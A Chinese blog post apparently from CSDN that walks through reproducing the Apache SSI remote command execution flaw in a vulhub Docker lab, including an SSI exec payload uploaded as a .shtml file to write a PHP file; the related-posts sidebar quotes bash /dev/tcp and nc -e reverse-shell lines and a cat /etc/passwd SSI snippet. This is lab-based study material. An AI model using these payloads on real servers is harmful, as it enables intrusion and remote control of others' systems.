vulhub中的Apache SSI 远程命令执行漏洞

已于 2024-01-09 09:34:27 修改
阅读量1.2k 收藏 10
点赞数 11
文章标签: apache
于 2024-01-08 08:51:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59020256/article/details/135448667
版权

Apache SSI 远程命令执行漏洞

1.cd到ssi-rce

cd /opt/vulhub/httpd/ssi-rce/

2.执行docker-compose up -d

docker-compose up -d

3.查看靶场是否开启成功

 dooker ps

拉取成功了

4.访问url

这里已经执行成功了,注意这里需要加入/upload.php

5.写入一句话木马

<!--#exec cmd="echo '<?php phpinfo(); ?>' > /var/www/html/this.php" -->

6.提交查询

7.点击shell.shtml

8.查看是否写入成功

 docker exec -it ssi-rce_apache_1 /bin/bash

9.获取phpinfo

爱喝水的泡泡
关注
  • 11
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
07 - vulhub - Apache SSI 远程命令执行漏洞,带你碾压面试官
m0_67621628的博客
03-22 639
<!--#echo var="cat /etc/passwd" --> []( )漏洞复现 []( )环境准备 靶机环境 139.196.87.102 (vulhub) 攻击机环境 192.168.8.131 (虚拟机 Ubuntu 20、Java1.8、Burp) 启动 Apache SSI 远程命令执行漏洞 环境 1.进入 vulhubssi-rce 路径 cd /usr/local/tools/vulhub/httpd/ssi-rce 2.编译并启动环境 docker-c
Apache默认是不支持SSI如何给Apache增加SSI支持
09-15
SSI翻译成文就是服务器端包含的意思,从技术角度上说,SSI就是在HTML文件,可以通过注释行调用的命令或指针,下面给大家介绍下如何给Apache增加SSI支持
Apache SSI 远程命令执行漏洞SSI注入漏洞复现 _ _使用vulhub搭建环境
net的博客
02-19 299
实验环境:Ubuntu。
复现Apache SSI 远程命令执行漏洞
qq_62673514的博客
02-19 134
复现Apache SSI 远程命令执行漏洞
命令执行漏洞【2】vulhub远程命令执行漏洞复现
最新发布
LfanBQX的博客
04-26 334
bash -i >& /dev/tcp/10.1.1.101/6666 0>&1 (被控制端未装nc,就可以使用bash(linux都能连接))在linux特有临时目录/tmp下创建空文件,由于通常该目录不会存在该名称的文件,所以可以作为命令执行的验证命令.被控制端 nc 10.1.1.101 6666 -e /bin/bash。可看到在/tmp/路径下,已成功创建的success文件,说明漏洞利用成功。(1)s2-061漏洞复现。(2)s2-059漏洞复现
07 - vulhub - Apache SSI 远程命令执行漏洞,最新阿里+头条+腾讯大厂Python笔试真题
2401_83945997的博客
03-28 759
学好 Python 不论是就业还是做副业赚钱都不错,但要学会 Python 还是要有一个学习规划。最后大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
vulhub-httpdssi-rce
qq_26947429的博客
07-22 618
漏洞原理 在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。 如果目标服务器开启了SSI与CGI支持,我们可以上传一个后缀为shtml文件 并利用<!--#exec cmd="id" -->语法执行任意命令。 第一步访问没有主页面利用目录扫描工具扫出目录 测试上传文件限制 很显然不能上传.php文件 可已上传一个.shtml文件来执行命令 文件里面是` <!--#exec cmd="whoami" -->` 命令执行成功! 然后开始进行菜刀连接 在1
配置Apache支持shtml(SSI)的方法
09-15
主要介绍了配置Apache支持shtml(SSI)的方法,需要的朋友可以参考下
apache SSI教程文档
10-24
如描述所述,可以在Apache的配置文件`httpd.conf`添加特定的指令来开启SSI支持。在相应目录配置段添加`AddType text/html .ssi`以声明`.ssi`文件类型为HTML,接着添加`Options Includes`以启用SSI功能,最后...
apache SHTML网页SSI使用详解
01-11
方法一:下面是详细的设置apache支持shtml的设置步骤开启includes模块运行shtml 0、开启php环境安装目录 (我的为D:\wamp\Apache2\conf下) 的httpd.conf 文件的(大概408-409行处): 1、 AddType text/...
apache ssi 使用例子
09-01
在技术上,SSI就是在静态HTML文件,根据需求插入不同的内容。 例如一个article的频道,每一个article内页都生成一个静态的HTML,如此时,header某个位置需要修改,则需要重新生成所有article的静态HTML文件。 如...
vulhub-CVE-2018-1273远程命令执行漏洞复现
m0_62008601的博客
09-23 1304
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。看到靶机已存在shll.elf文件。接着我们就需要开启监听,这时候用nc进行监听的话,收不到反弹的shell。发送命令之后返回500说明执行成功,接着我们登录到doker容器看到success文件成功被创建,说明漏洞存在。执行之后如果没成功反弹shell ,可以先执行赋予文件权限的命令。开启监听之后,再修改请求命令,让靶机执行木马文件上线。
vulhub-httpd-ssi-rce
Ronin_qianmo的博客
07-27 499
1、漏洞描述 在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用#exec cmd=“id” 语法执行任意命令。 2、漏洞原理 SSI(服务器端包含)是放置在HTML页面的指令,并在服务页面时在服务器上对其进行评估。它们使您可以将动态生成的内容添加到现有的HTML页面, 而不必通过CGI程序或其他动态技术来提供整个页面。 其实apache的ssl更像是flask的jinjia2,用来实现和前端实现一种动态交
(五)vulhub专栏:Jboss远程代码执行漏洞复现
云舒的博客
07-13 578
Jboss远程代码执行 CVE-2017-12149 CVE-2017-7504
vulhub thinkphp5 5.0.23 远程代码执行漏洞
weixin_53696027的博客
03-15 730
vulhub thinkphp5 5.0.23 远程代码执行漏洞
vulhub-漏洞复现(Spring Data Rest 远程命令执行漏洞(CVE-2017-8046))
weixin_45095113的博客
12-08 472
vulhub漏洞复现
[Vulhub] Apache HTTPD解析漏洞 & Apache SSI RCE
weixin_45605352的博客
06-07 665
文章目录Apache HTTPD 换行解析漏洞(CVE-2017-15715)0x00 漏洞描述0x01 影响版本0x02 靶场环境0x03 漏洞分析0x04 漏洞复现Apache HTTPD 多后缀解析漏洞0x00 漏洞描述0x01 影响版本0x02 靶场环境0x03 漏洞分析0x04 漏洞复现Apache SSI 远程命令执行漏洞0x00 漏洞描述0x01 影响版本0x02 靶场环境0x03 漏洞分析0x04 漏洞复现 Apache HTTPD 换行解析漏洞(CVE-2017-15715) 0x00
vulhub】structs2远程命令执行 CVE-2018-11776(S2-057)
weixin_42884199的博客
12-06 500
前提 1、alwaysSelectFullNamespace被设置为true,此时namespace的值是从URL获取的。URL是可控的,所以namespace也是可控的。 2、action元素没有名称空间属性集,或者使用通配符。该名称空间将由用户从URL传递并解析为OGNL表达式,最终导致远程代码执行的脆弱性。 一、启动靶机 docker-compose build docker-compose up -d 二、构造payload URL: http://192.168.150.146:8080/s
CVE-2017-15715漏洞SSI-RCE漏洞
07-27
CVE-2017-15715是一个存在于Apache Tomcat软件漏洞,该漏洞使得攻击者可以通过发送特制的HTTP请求,触发目标服务器上的远程代码执行。这个漏洞的影响范围是Tomcat 9.0.0.M1到9.0.0.M28版本(不包括9.0.0.M9版本)。如果目标服务器受到此漏洞的影响,攻击者可以利用它执行任意代码,可能导致敏感信息泄露或服务器完全被控制。 SSI-RCE漏洞是一种服务器端包含(SSI漏洞,可能导致远程命令执行SSI是一种服务器端处理动态内容的技术,它允许将外部文件包含到网页。如果服务器未正确配置和过滤用户提供的输入,攻击者可以通过注入恶意代码来执行任意命令。这种漏洞可能会导致服务器被完全控制,从而造成数据泄露、服务拒绝或其他恶意行为。 请注意,对于具体的漏洞信息和修复建议,请查阅相应漏洞的CVE编号或相关安全公告以获取更准确和详细的信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值